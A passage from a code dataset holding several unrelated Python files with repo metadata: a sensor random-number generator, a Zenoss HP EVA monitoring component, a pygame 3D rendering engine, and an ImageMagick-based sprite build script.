Please try again.\")\r\n return get_data_types(nb_sensors)\r\n\r\n\r\ndef get_sensors_minmax(nb_sensors, data_types):\r\n \"\"\"\r\n What are min & max values from which random numbers should be generated (for each sensor)\r\n Input:\r\n nb_sensors -> for how many sensors the details needs to be fetched\r\n data_types -> a list of data types (integers)\r\n Output:\r\n details_sensors -> a nested dictionary with info for each sensor\r\n \"\"\"\r\n\r\n # create a nested dict with info for each sensor:\r\n # data type, min value, max value\r\n details_sensors = {\"Sensor {}\".format(idx + 1): {} for idx in range(nb_sensors)}\r\n sensors_minmax = [] # list of tuples\r\n\r\n for idx in range(nb_sensors):\r\n print(\"Give min and max range of numbers for sensor {}:\".format(idx + 1))\r\n sensor = get_sensor_minmax() # tuple with min & max values for a given sensor\r\n sensors_minmax.append(sensor)\r\n\r\n # complete the nested dictionary with corresponding values for each sensor\r\n for idx in range(nb_sensors):\r\n details_sensors['Sensor {}'.format(idx + 1)] = {'data_type': data_types[idx], 'min': sensors_minmax[idx][0],\r\n 'max': sensors_minmax[idx][1]}\r\n\r\n return details_sensors\r\n\r\n\r\ndef get_sensor_minmax():\r\n \"\"\"\r\n A function to get one set of input (min & max) from the console\r\n Output\r\n sensor_minmax -> tuple of integers for min value and max value\r\n \"\"\"\r\n\r\n sensor = input()\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n sensor_splitted = sensor.split(\" \")\r\n try:\r\n sensor_splitted_int = [int(sensor_splitted[i]) for i in range(len(sensor_splitted))]\r\n if sensor_splitted_int[0] < sensor_splitted_int[1]:\r\n sensor_minmax = tuple(sensor_splitted_int)\r\n return sensor_minmax\r\n else:\r\n raise ValueError\r\n except ValueError:\r\n print(\"Incorrect Input. 
Please try again.\")\r\n return get_sensor_minmax()\r\n\r\n\r\ndef sensor_data(data_type, min_val, max_val):\r\n \"\"\"\r\n A function to generate the random number\r\n Input\r\n data_type -> int, type of output for the given sensor\r\n min_val -> minimum allowed value for this sensor\r\n max_val -> maximum allowed value for this sensor\r\n Output:\r\n number -> sensor output for the given iteration\r\n \"\"\"\r\n\r\n if data_type == 1:\r\n number = rd.randint(min_val, max_val)\r\n return number\r\n elif data_type == 2:\r\n number = float(\"{0:.2f}\".format(rd.uniform(min_val, max_val)))\r\n return number\r\n\r\n\r\ndef write_into_csv(random_numbers):\r\n \"\"\"\r\n A function to write each set of random data into one line in a csv file.\r\n The file will be created if doesn't exist, or new data will be added if already exist.\r\n Input\r\n random_numbers -> a set of output of all the sensors\r\n Output:\r\n data is written into a csv file\r\n \"\"\"\r\n\r\n with open(r'sensor_data.txt', 'a', encoding='utf8') as csvfile:\r\n sensor_writer = csv.writer(csvfile, delimiter='|', quotechar='\"', quoting=csv.QUOTE_NONE)\r\n sensor_writer.writerow(random_numbers)\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n Main function to run the generator\r\n Manages obtaining input values from the user, generating data in a given time interval and writing it into a file\r\n \"\"\"\r\n nb_sensors = get_nb_sensors()\r\n ref_rate = get_refresh_rate()\r\n data_types = get_data_types(nb_sensors)\r\n sensors_min_max = get_sensors_minmax(nb_sensors, data_types)\r\n\r\n while True:\r\n sensor_numbers = []\r\n for idx in range(nb_sensors):\r\n tmp = sensors_min_max[f'Sensor {idx+1}'] # details of a given sensor (data type, min & max values)\r\n data = sensor_data(tmp['data_type'], tmp['min'], tmp['max'])\r\n sensor_numbers.append(data)\r\n write_into_csv(sensor_numbers)\r\n print(sensor_numbers)\r\n time.sleep(ref_rate)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"RozaGruter/Random_Numbers_Generator","sub_path":"Random_Numbers_Generator_Console.py","file_name":"Random_Numbers_Generator_Console.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38576339738","text":"__doc__=\"\"\"HPEVAConsistencySet\n\nHPEVAConsistencySet is an abstraction of a HPEVA_ConsistencySet\n\n$Id: HPEVAConsistencySet.py,v 1.2 2010/12/06 09:55:38 egor Exp $\"\"\"\n\n__version__ = \"$Revision: 1.2 $\"[11:-2]\n\nfrom Globals import DTMLFile, InitializeClass\nfrom AccessControl import ClassSecurityInfo\nfrom Products.ZenModel.OSComponent import *\nfrom Products.ZenRelations.RelSchema import *\nfrom Products.ZenModel.ZenossSecurity import *\nfrom HPEVAComponent import *\n\nfrom Products.ZenUtils.Utils import convToUnits\nfrom Products.ZenUtils.Utils import prepId\n\nimport logging\nlog = logging.getLogger(\"zen.HPEVAConsistencySet\")\n\n\ndef manage_addConsistencySet(context, id, userCreated, REQUEST=None):\n \"\"\"make ConsistencySet\"\"\"\n svid = prepId(id)\n sv = HPEVAConsistencySet(svid)\n context._setObject(svid, sv)\n sv = context._getOb(svid)\n if userCreated: sv.setUserCreatedFlag()\n if REQUEST is not None:\n REQUEST['RESPONSE'].redirect(context.absolute_url()+'/manage_main')\n return sv\n\nclass HPEVAConsistencySet(OSComponent, HPEVAComponent):\n \"\"\"HPConsistencySet object\"\"\"\n\n portal_type = meta_type = 'HPEVAConsistencySet'\n\n caption = \"\"\n failSafe = \"\"\n hostAccessMode = \"\"\n participationType = \"\"\n 
remoteCellName = \"\"\n suspendMode = \"\"\n writeMode = \"\"\n state = \"OK\"\n\n _properties = OSComponent._properties + (\n {'id':'caption', 'type':'string', 'mode':'w'},\n {'id':'failSafe', 'type':'string', 'mode':'w'},\n {'id':'hostAccessMode', 'type':'string', 'mode':'w'},\n {'id':'participationType', 'type':'string', 'mode':'w'},\n {'id':'remoteCellName', 'type':'string', 'mode':'w'},\n {'id':'suspendMode', 'type':'string', 'mode':'w'},\n {'id':'writeMode', 'type':'string', 'mode':'w'},\n {'id':'state', 'type':'string', 'mode':'w'},\n )\n\n _relations = OSComponent._relations + (\n (\"os\", ToOne(ToManyCont,\n \"ZenPacks.community.HPEVAMon.HPEVADevice.HPEVADeviceOS\",\n \"drgroups\")),\n (\"storagepool\", ToOne(ToMany,\n \"ZenPacks.community.HPEVAMon.HPEVAStoragePool\",\n \"drgroups\")),\n (\"virtualdisks\", ToMany(\n ToOne,\n \"ZenPacks.community.HPEVAMon.HPEVAStorageVolume\",\n \"drgroup\")),\n )\n\n factory_type_information = (\n {\n 'id' : 'ConsistencySet',\n 'meta_type' : 'ConsistencySet',\n 'description' : \"\"\"Arbitrary device grouping class\"\"\",\n 'icon' : 'ConsistencySet_icon.gif',\n 'product' : 'ZenModel',\n 'factory' : 'manage_addConsistencySet',\n 'immediate_view' : 'viewHPEVAConsistencySet',\n 'actions' :\n (\n { 'id' : 'status'\n , 'name' : 'Status'\n , 'action' : 'viewHPEVAConsistencySet'\n , 'permissions' : (ZEN_VIEW,)\n },\n { 'id' : 'members'\n , 'name' : 'Members'\n , 'action' : 'viewHPEVAConsistencySetMembers'\n , 'permissions' : (ZEN_VIEW, )\n },\n { 'id' : 'events'\n , 'name' : 'Events'\n , 'action' : 'viewEvents'\n , 'permissions' : (ZEN_VIEW, )\n },\n { 'id' : 'perfConf'\n , 'name' : 'Template'\n , 'action' : 'objTemplates'\n , 'permissions' : (ZEN_CHANGE_DEVICE, )\n },\n { 'id' : 'viewHistory'\n , 'name' : 'Modifications'\n , 'action' : 'viewHistory'\n , 'permissions' : (ZEN_VIEW_MODIFICATIONS,)\n },\n )\n },\n )\n\n\n security = ClassSecurityInfo()\n\n\n security.declareProtected(ZEN_CHANGE_DEVICE, 'setStoragePool')\n def setStoragePool(self, spid):\n \"\"\"\n Set the storagepool relationship to the storage pool specified by the given\n id.\n \"\"\"\n strpool = getattr(self.os().storagepools, str(spid), None)\n if strpool: self.storagepool.addRelation(strpool)\n else: log.warn(\"storage pool id:%s not found\", spid)\n\n\n security.declareProtected(ZEN_VIEW, 'getStoragePool')\n def getStoragePool(self):\n return self.storagepool()\n\n\n security.declareProtected(ZEN_VIEW, 'getStoragePoolName')\n def getStoragePoolName(self):\n return getattr(self.getStoragePool(), 'caption', 'Unknown')\n\n\n def getCurrentPercentLogLevel(self):\n return \"%s%%\"%self.cacheRRDValue('CurrentPercentLogLevel', 0)\n\n\n def getLogDiskReservedCapacity(self):\n return convToUnits(self.cacheRRDValue('LogDiskReservedCapacity', 0)*512)\n\n\n def getRRDNames(self):\n \"\"\"\n Return the datapoint name of this ConsistencySet\n \"\"\"\n return ['ConsistencySet_CurrentPercentLogLevel',\n 'ConsistencySet_LogDiskReservedCapacity',\n ]\n\nInitializeClass(HPEVAConsistencySet)\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.community.HPEVAMon/ZenPacks/community/HPEVAMon/HPEVAConsistencySet.py","file_name":"HPEVAConsistencySet.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"42735267945","text":"import math\r\nimport pygame\r\nimport pygame.gfxdraw\r\nimport os\r\nimport sys\r\nfrom pygame.locals import *\r\nfrom .generals import *\r\n\r\n\r\n#Transform float positions 
into simple integers to avoid Errors\r\ndef simplifypos(p): return (int(p[0]),int(p[1]))\r\n\r\ndef root(p):\r\n if p > 0: return math.sqrt(p)\r\n elif p < 0: return math.sqrt(-p)\r\n else: return 0.1\r\n \r\n#2d vectors are used for 3d representation, 3d vectors have a function witch turn them into representable 2d coordinates \r\nclass vec2d(object):\r\n \r\n def __init__(self,pos):\r\n self.pos = pos \r\n \r\n def pointatX(self,x):\r\n a = x/self.pos[0]\r\n b = self.pos[1]*a\r\n return (x,b)\r\n \r\n def pointatY(self,y):\r\n b = y/self.pos[1]\r\n a = self.pos[0]*b\r\n return (a,y)\r\n\r\n\r\n#simple vector operations \r\ndef addvec(v1,v2):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] += v2.pos[i]\r\n v = vec2d(tuple(ret))\r\n return v\r\n\r\ndef addvec3d(v1,v2):\r\n ret = list(v1.pos)\r\n su = list(v2.pos)\r\n for i in range(len(ret)): ret[i] += su[i]\r\n v = vec3d(tuple(ret))\r\n return v\r\n\r\ndef subvec(v1,v2):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] -= v2.pos[i]\r\n v = vec2d(tuple(ret))\r\n return v \r\n\r\ndef subvec3d(v1,v2):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] -= v2.pos[i]\r\n v = vec3d(tuple(ret))\r\n return v \r\n\r\ndef mulvec(v1,n):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] *= n\r\n v = vec2d(tuple(ret))\r\n return v \r\n\r\ndef mulvec(v1,n):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] *= n\r\n v = vec3d(tuple(ret))\r\n return v \r\n\r\ndef divvec(v1,num):\r\n n = num\r\n if n == 0: n = -0.1\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] = int(ret[i]/n)\r\n v = vec2d(tuple(ret))\r\n return v \r\n\r\ndef divvec3d(v1,num):\r\n n = num\r\n if n == 0: n = -0.1\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] = int(ret[i]/n)\r\n v = vec3d(tuple(ret))\r\n return v \r\n \r\ndef absvec3d(v):\r\n ret = []\r\n for p in v.pos: ret.append(abs(p))\r\n return vec3d(tuple(ret))\r\n\r\n#Using shapely to get if a 2d polygon is totally inside another one\r\n\r\ndef totally_inside(p1,p2):\r\n ret = True\r\n for p in p2:\r\n if not Polygon(p1).contains(Point(p)):\r\n ret = False\r\n break\r\n return ret\r\n\r\n#Shitty texture loading\r\n\r\ndef texture(path): return pygame.image.load(os.path.join(os.getcwd(),'res','img',path))\r\n \r\n#3d vectors to computate dimensions easily \r\nclass vec3d(object):\r\n def __init__(self,pos):\r\n self.pos = pos\r\n \r\n def get2d(self):\r\n v = vec2d((self.pos[0],self.pos[1]))\r\n if self.pos[2] >= 0: v = divvec(mulvec(v,40),root(self.pos[2]))\r\n else: v = addvec(divvec(mulvec(v,40),root(0)),divvec(mulvec(v,20),root(0))) \r\n return v\r\n\r\n p = list(pos)\r\n \r\n x,y,z = 0,0,0\r\n\r\n def rotate(self,val,p,axis):\r\n \r\n x = self.pos[0]\r\n y = self.pos[1]\r\n z = self.pos[2]\r\n \r\n if axis == 0: \r\n x = p[0] + math.cos(val)*(self.pos[0] - p[0]) - math.sin(val)*(self.pos[2] - p[2]) \r\n z = p[2] + math.sin(val)*(self.pos[0] - p[0]) + math.cos(val)*(self.pos[2] - p[2])\r\n \r\n elif axis == 1:\r\n x = p[0] + math.cos(val)*(self.pos[0] - p[0]) - math.sin(val)*(self.pos[1] - p[1]) \r\n y = p[1] + math.sin(val)*(self.pos[0] - p[0]) + math.cos(val)*(self.pos[1] - p[1])\r\n \r\n elif axis == 2: \r\n y = p[1] + math.sin(val)*(self.pos[2] - p[2]) + math.cos(val)*(self.pos[1] - p[1])\r\n z = p[2] + math.cos(val)*(self.pos[2] - p[2]) - math.sin(val)*(self.pos[1] - p[1])\r\n \r\n self.pos = (x,y,z)\r\n\r\n \r\n def getDistance(self,p): \r\n ret = 0\r\n vec = subvec3d(self,vec3d(p))\r\n for v in vec.pos: ret += pow(v,2)\r\n ret = 
math.sqrt(ret)\r\n return ret\r\n \r\n def getAngles(self,p):\r\n \r\n vec = subvec3d(self,vec3d(p))\r\n \r\n angle_xz = math.atan2(vec.pos[0],vec.pos[2])\r\n angle_xy = math.atan2(vec.pos[0],vec.pos[1])\r\n \r\n return angle_xz, angle_xy\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n #objects based on 3d vectors\r\n \r\nclass triangle(object): \r\n def __init__(self,w,poss,col): \r\n self.points = [poss[0],poss[1],poss[2]]\r\n po = []\r\n for p in self.points:\r\n po.append(w.vcount)\r\n w.addvec(vec3d(p))\r\n w.addpol(po) \r\n self.pol_ID = w.pcount-1\r\n self.world = w\r\n self.col = col\r\n w.col.append(col)\r\n self.center = vec3d(((poss[0][0] + poss[1][0] + poss[2][0])/3,(poss[0][1] + poss[1][1] + poss[2][1])/3,(poss[0][2] + poss[1][2] + poss[2][2])/3))\r\n \r\n def move(self,pos): \r\n self.world.movepol(self.pol_ID,pos)\r\n self.center = addvec3d(self.center,vec3d(pos))\r\n \r\n def rotate(self,val,pos,axis): \r\n self.world.polrotate(self.pol_ID,val,pos,axis)\r\n self.center.rotate(val,pos,axis)\r\n\r\n \r\nclass rect(object):\r\n def __init__(self,w,p,dim,col):\r\n self.triangles = []\r\n self.world = w\r\n pos = vec3d(p)\r\n self.col = col\r\n \r\n tr = [\r\n [\r\n pos,\r\n addvec3d(pos,vec3d((dim[0],0,0))),\r\n addvec3d(pos,vec3d((0,dim[1],0))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],0)))\r\n ],\r\n [\r\n pos,\r\n addvec3d(pos,vec3d((0,0,dim[2]))),\r\n addvec3d(pos,vec3d((0,dim[1],0))),\r\n addvec3d(pos,vec3d((0,dim[1],dim[2])))\r\n ],\r\n [\r\n addvec3d(pos,vec3d((0,0,dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],0,dim[2]))),\r\n addvec3d(pos,vec3d((0,dim[1],dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],dim[2])))\r\n ],\r\n [\r\n addvec3d(pos,vec3d((dim[0],0,0))),\r\n addvec3d(pos,vec3d((dim[0],0,dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],0))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],dim[2])))\r\n ],\r\n [\r\n pos,\r\n addvec3d(pos,vec3d((0,0,dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],0,0))), \r\n addvec3d(pos,vec3d((dim[0],0,dim[2]))) \r\n ],\r\n [\r\n addvec3d(pos,vec3d((0,dim[1],0))),\r\n addvec3d(pos,vec3d((0,dim[1],dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],0))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],dim[2]))) \r\n ]\r\n ]\r\n \r\n for q in tr:\r\n self.triangles.append(triangle(self.world,(q[0].pos,q[1].pos,q[2].pos),col))\r\n self.triangles.append(triangle(self.world,(q[3].pos,q[1].pos,q[2].pos),col))\r\n \r\n self.center = vec3d((p[0]+dim[0]/2,p[1]+dim[1]/2,p[2]+dim[2]/2))\r\n \r\n def move(self,pos):\r\n for t in self.triangles: t.move(pos)\r\n self.center = addvec3d(self.center,vec3d(pos))\r\n \r\n def rotate(self,val,pos,axis):\r\n for t in self.triangles: t.rotate(val,pos,axis)\r\n \r\n \r\nclass body(object):\r\n def __init__(self,w,p,points,col):\r\n \r\n self.triangles = []\r\n self.world = w\r\n self.col = col\r\n \r\n self.origin = vec3d(p)\r\n \r\n i = 0\r\n \r\n while (i+2) < len(points):\r\n self.triangles.append(triangle(self.world,(points[i],points[i+1],points[i+2]),self.col))\r\n i += 1\r\n \r\n self.triangles.append(triangle(self.world,(points[i],points[i+1],points[0]),self.col)) \r\n self.triangles.append(triangle(self.world,(points[i+1],points[0],points[1]),self.col))\r\n \r\n self.move(p)\r\n \r\n def move(self,pos):\r\n for t in self.triangles: t.move(pos)\r\n \r\n def rotate(self,val,pos,axis):\r\n for t in self.triangles: t.rotate(val,pos,axis) \r\n \r\n \r\n\r\n \r\nclass world(object):\r\n\r\n def __init__(self,s):\r\n self.vec = []\r\n self.vec2 = []\r\n self.pol = []\r\n self.col = []\r\n self.fpoint = (s.get_size()[0]/2,s.get_size()[1]/2)\r\n 
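        # fpoint is the screen center; draw() adds it to every projected 2d point so the scene origin lands mid-screen.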
self.disp = s\r\n self.vcount = 0\r\n self.pcount = 0\r\n self.disp_polygon = [[0,0],[0,self.disp.get_size()[0],0],self.disp.get_size(),[0,self.disp.get_size()[1]]]\r\n self.background = None\r\n \r\n def addvec(self,v):\r\n self.vec.append(v)\r\n self.vec2.append(v.get2d())\r\n self.vcount += 1\r\n \r\n def addpol(self,l): \r\n self.pol.append(l)\r\n self.pcount += 1\r\n \r\n def movevec(self,v,val): self.vec[v] = addvec3d(self.vec[v],vec3d(val))\r\n \r\n def setvec(self,v,val): self.vec[v] = vec3d(val)\r\n \r\n def movepol(self,ID,val):\r\n for v in self.pol[ID]: self.vec[v] = addvec3d(self.vec[v],vec3d(val))\r\n \r\n def polrotate(self,ID,val,pos,axis): \r\n for v in self.pol[ID]: self.vec[v].rotate(val,pos,axis)\r\n \r\n \r\n def sortpol(self,p,c): \r\n unsorted_z = []\r\n sorted_z = []\r\n sorted_col = []\r\n ret = []\r\n \r\n for p0 in p:\r\n a = 0\r\n b = 0\r\n for n in p0:\r\n a += self.vec[n].pos[2]\r\n b += 1\r\n unsorted_z.append(round(a/b,3))\r\n sorted_z.append(round(a/b,3))\r\n \r\n \r\n sorted_z.sort()\r\n \r\n takensorts = []\r\n \r\n for u in unsorted_z:\r\n i = 0\r\n for s in sorted_z: \r\n taken = False\r\n if u == s:\r\n if len(takensorts) > 0:\r\n taken = False\r\n for t in takensorts:\r\n if i == t:\r\n taken = True\r\n break\r\n if not taken:\r\n ret.append(self.pol[i])\r\n sorted_col.append(self.col[i])\r\n takensorts.append(i) \r\n i += 1\r\n \r\n ret.reverse()\r\n sorted_col.reverse()\r\n \r\n return ret, sorted_col\r\n\r\n\r\n \r\n def update(self):\r\n i = 0\r\n while i < len(self.vec):\r\n self.vec2[i] = self.vec[i].get2d()\r\n i += 1\r\n \r\n \r\n def draw(self,mode): \r\n \r\n #draw background if exists\r\n \r\n if type(self.background) is pygame.Surface: \r\n self.disp.blit(self.background,(0,0))\r\n elif type(self.background) is tuple: self.disp.fill(self.background)\r\n else: self.disp.fill((0,0,0))\r\n \r\n pl,c = self.sortpol(self.pol, self.col)\r\n \r\n j = 0\r\n for p in pl:\r\n p2 = []\r\n p3 = []\r\n p1 = []\r\n neg = True\r\n \r\n for i in p: \r\n p2.append(addvec(self.vec2[i],vec2d(self.fpoint)).pos)\r\n if self.vec[i].pos[2] > 0: neg = False\r\n \r\n try: \r\n for i in pl[j+1]: p3.append(addvec(self.vec2[i],vec2d(self.fpoint)).pos)\r\n except IndexError: pass\r\n\r\n try: \r\n for i in pl[j-1]: p1.append(addvec(self.vec2[i],vec2d(self.fpoint)).pos)\r\n except IndexError: pass\r\n \r\n if not neg: \r\n if mode == 0: pygame.draw.lines(self.disp,(255,255,255),True,p2) \r\n elif mode == 1: \r\n if type(c[j]) is tuple: pygame.draw.polygon(self.disp,c[j],p2)\r\n elif type(c[j]) is pygame.Surface: pygame.gfxdraw.textured_polygon(self.disp,p2,c[j],0,0)\r\n \r\n j += 1\r\n \r\nclass win(object):\r\n\r\n def __init__(self,dim):\r\n self.display = pygame.display.set_mode(dim)\r\n self.clock = pygame.time.Clock()\r\n self.fps = 60\r\n \r\n def update(self,func):\r\n \r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n func(pygame.key.get_pressed())\r\n \r\n self.clock.tick(self.fps)\r\n pygame.display.flip()\r\n","repo_name":"ManuelCB/calc3D","sub_path":"calc3D.py","file_name":"calc3D.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23406574228","text":"import glob, os\r\nimport subprocess\r\nimport shutil\r\nimport collections\r\nimport struct\r\n\r\nmagick_path = \"magick\"\r\nspriteguy_path = \"spriteguy\"\r\n\r\nimage_names = []\r\nsizes = {}\r\noffsets = {}\r\nscale = 2\r\ntemp_files = 
[]\r\nlight_levels = ['_L3', '_L2', '_L1', '_L0']\r\n#light_levels = ['_LB']\r\n\r\nfor file in glob.glob(\"*.spr\"):\r\n\tos.remove(file)\r\n\r\nfor file in glob.glob(\"*.png\"):\r\n\timage_names.append( os.path.splitext(os.path.basename(file))[0] )\r\n\r\nfor name in image_names:\r\n\tlump = name + \".lmp\"\r\n\tif os.path.exists(lump):\r\n\t\tf = open(lump, \"rb\")\r\n\t\ts = f.read(8)\r\n\t\tw, h, x, y = struct.unpack(\" 2:\r\n\t\tnewAngle = angle[2:4] + angle[0:2]\r\n\t\tnewName = name[:4] + newAngle\r\n\t\tprint(\"Flipping %s -> %s\" % (name, newName))\r\n\t\t\r\n\t\targs = [magick_path, 'convert', '-flop', name + \".png\", newName + \".png\"]\r\n\t\tsubprocess.check_call(args)\r\n\t\toffsets[newName] = offsets[name]\r\n\t\tsizes[newName] = sizes[name]\r\n\t\timage_names.append(newName)\r\n\t\ttemp_files.append(newName + \".png\")\r\n\t\r\n\t\t\r\nfor name in image_names:\r\n\tprint(\"Adding borders %s\" % name)\r\n\t\r\n\t# scale up\r\n\t'''\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-interpolate', 'Nearest', '-filter', 'point', '-resize', '200%', name + \".png\", name + \"_L3.png\"]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\t\r\n\t# Add 1px border so HL's bilinear filtering doesn't get to wrap pixels at the edges\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-bordercolor', 'transparent', '-border', '2x2', name + \".png\", name + \"_L3.png\"]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\t'''\r\n\twidth = sizes[name][0]+4\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-flip', '-gravity', 'north', '-extent', '%sx170' % width, name + \"_L3.png\", name + \"_L3.png\"]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\ttemp_files.append(name + \"_L3.png\")\r\n\r\n\t\r\nfor name in image_names:\r\n\tprint(\"Baking light levels %s\" % name)\r\n\t'''\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-fill', 'black', '-colorize', '90%', name + \"_L3.png\", name + \"_L0.png\"]\r\n\ttemp_files.append(name + \"_L0.png\")\r\n\toffsets[name + \"_L0.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-fill', 'black', '-colorize', '60%', name + \"_L3.png\", name + \"_L1.png\"]\r\n\ttemp_files.append(name + \"_L1.png\")\r\n\toffsets[name + \"_L1.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-fill', 'black', '-colorize', '30%', name + \"_L3.png\", name + \"_L2.png\"]\r\n\ttemp_files.append(name + \"_L2.png\")\r\n\toffsets[name + \"_L2.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\t'''\r\n\t# scale up\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-interpolate', 'Nearest', '-filter', 'point', '-resize', '200%', name + \".png\", name + \"_LB.png\"]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\t# Add 1px border so HL's bilinear filtering doesn't get to wrap pixels at the edges\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-bordercolor', 'transparent', '-border', '2x2', name + \"_LB.png\", name + \"_LB.png\"]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\targs = [magick_path, 'convert', '-fill', 'black', '-colorize', '99%', name + \"_LB.png\", name + \"_LB.png\"]\r\n\ttemp_files.append(name + \"_LB.png\")\r\n\toffsets[name + \"_LB.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\t# remove alpha\r\n\targs = [magick_path, 'convert', '-alpha', 'remove', '-background', 'blue', name + 
\"_LB.png\", name + \"_LB.png\"]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\t\r\n\t\r\ncount = 0\r\npanims = collections.OrderedDict({})\r\nfor name in image_names:\r\n\tcount += 1\r\n\tangle = name[-1:]\r\n\tif angle == '0':\r\n\t\tbasename = name[:-2]\r\n\t\tif basename not in panims:\r\n\t\t\tpanims[basename] = []\r\n\t\tpanims[basename].append(name)\r\n\telse:\r\n\t\tfor level in light_levels:\r\n\t\t\tprint(\"Making upright sprites %s\" % (name + level))\r\n\t\t\tofs = offsets[name]\r\n\t\t\targs = [spriteguy_path, name + level + \".png[%s,%s]\" % (ofs[0], ofs[1]), name + level + \".spr\", \"type=upright\"]\r\n\t\t\tsubprocess.check_call(args)\r\n\t\t\t\r\nregulars = []\r\nfor anim in panims:\r\n\tprint(\"Making parallel sprites %s\" % anim)\r\n\tfor level in light_levels:\r\n\t\targs = [spriteguy_path]\r\n\t\tfor name in panims[anim]:\r\n\t\t\tofs = offsets[name]\r\n\t\t\targs.append(name + level + \".png[%s,%s]\" % (ofs[0], ofs[1]))\r\n\t\t\tif level == '_L3' or level == '_LB':\r\n\t\t\t\tregulars.append(name)\r\n\t\targs.append(anim + level + \".spr\")\r\n\t\targs.append(\"type=upright\")\r\n\t\tsubprocess.check_call(args)\r\n\t\t\r\n\t\r\n# Make an animation array def for angelscript\r\nanims = collections.OrderedDict({})\r\nfor name in image_names:\r\n\tbase = name[:4]\r\n\tangle = name[-1:]\r\n\tif angle == '0':\r\n\t\tcontinue\r\n\tif base not in anims:\r\n\t\tanims[base] = collections.OrderedDict({})\r\n\tframe = name[4]\r\n\tif not frame in anims[base]:\r\n\t\tanims[base][frame] = []\r\n\tanims[base][frame].append(name)\r\n\r\n\t\r\ndef base36(num):\r\n\tb36 = ''\r\n\tcharset = \"0123456789abcdefghijklmnopqrstuvwxyz\"\r\n\t\r\n\twhile num != 0:\r\n\t\tc = charset[num % 36]\r\n\t\tb36 = c + b36\r\n\t\tnum /= 36\r\n\t\tnum = int(num)\r\n\treturn b36\t\r\n\t\r\nfh = open(\"anims.as\", \"w\")\r\n\r\nsprite_path = \"d/\"\r\nsuperImages = []\r\n\r\nidx = 36\r\nfor base in anims:\r\n\tsprite_prefix = base.lower()[0]\r\n\tsprite_prefix = 'd'\r\n\tfh.write(\"array< array< array > > SPR_ANIM_%s = {\\n\" % base)\r\n\tfor lvl, level in enumerate(light_levels):\r\n\t\tfh.write(\"\\t{\\n\")\r\n\t\tfor i, key in enumerate(anims[base]):\r\n\t\t\tfh.write('\\t\\t{ ')\r\n\t\t\t\r\n\t\t\tfor k, frame in enumerate(sorted(anims[base][key])):\r\n\t\t\t\tcomma = \", \" if k < len(anims[base][key])-1 else \" \"\r\n\t\t\t\tnice_name = frame + level\r\n\t\t\t\tofs = offsets[frame]\r\n\t\t\t\tif lvl == 3 or len(light_levels) == 1:\r\n\t\t\t\t\tsuperImages.append(frame + \"_L3.png[%s,%s]\" % (ofs[0]*scale, ofs[1]*scale))\t\r\n\t\t\t\treal_name = sprite_prefix + base36(idx)\r\n\t\t\t\tfh.write('\"%s.spr\"%s' % (sprite_path + real_name, comma))\r\n\t\t\t\t#os.rename(frame + level + \".spr\", sprite_prefix + base36(idx) + \".spr\")\r\n\t\t\t\tidx += 1\r\n\t\t\t\r\n\t\t\tcomma = \",\" if i < len(anims[base])-1 else \"\"\r\n\t\t\tfh.write('}%s\\n' % comma)\r\n\t\tcomma = \",\" if lvl < len(light_levels)-1 else \"\"\r\n\t\tfh.write('\\t}%s\\n' % comma)\r\n\tfh.write(\"};\\n\")\r\n\t\r\n\t# Now make the array for death framesa\r\n\tfh.write(\"array SPR_ANIM_DEATH_%s = { \" % base)\r\n\tidx = 0\r\n\tfor k, reg in enumerate(regulars):\r\n\t\tnice_name = frame + level\r\n\t\tofs = offsets[frame]\r\n\t\tsuperImages.append(reg + \"_L3.png[%s,%s]\" % (ofs[0]*scale, ofs[1]*scale))\t\r\n\t\t#os.rename(reg + \".spr\", sprite_prefix + base36(idx) + \".spr\")\r\n\t\tcomma = \", \" if k < len(regulars)-1 else \" \"\r\n\t\tfh.write('\"%s.spr\"%s' % (sprite_path + sprite_prefix + base36(idx), comma))\r\n\t\tidx += 
